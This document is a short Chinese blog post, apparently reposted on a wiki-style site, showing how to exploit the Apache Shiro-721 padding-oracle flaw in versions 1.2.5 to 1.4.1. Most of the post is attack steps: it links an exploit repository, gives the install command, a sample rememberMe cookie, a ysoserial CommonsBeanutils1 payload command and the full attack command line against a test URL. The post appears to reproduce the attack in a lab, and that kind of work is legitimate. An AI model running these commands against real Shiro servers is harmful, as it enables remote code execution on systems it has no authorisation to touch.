当先锋百科网

首页 1 2 3 4 5 6 7

影响版本(影响1.2.4之后):

1.2.5,

1.2.6,

1.3.0,

1.3.1,

1.3.2,

1.4.0-RC2,

1.4.0,

1.4.1

下载:

https://github.com/3ndz/Shiro-721

# 安装paddingoracle

python2 setup.py install

# 准备登陆成功之后的rememberMe的Cookie值

qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS

# 准备ysoserial生成的序列化数据文件

D:\repos\Java\jdk1.7.0_80\bin\java.exe -jar D:\repos\ysoserial\target\ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 calc > CommonsBeanutils1_calc.ser

# 准备shiro的页面url

http://cqq.com:8088/samples_web_war/home.jsp

# 开始攻击

"D:\Python27\python2.exe" shiro_exp.py http://cqq.com:8088/samples_web_war/home.jsp qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS D:\repos\ysoserial\CommonsBeanutils1_calc.ser

6964a28f2741b65880ccaba02ecbc1b8.png

据说要几个小时。

据说是在对1.2.4的shiro-550的修复方式中引入的,然后在 Apache Shior(1.4.2)修复。

参考:

原文链接:https://blog.csdn.net/caiqiiqi/article/details/109289504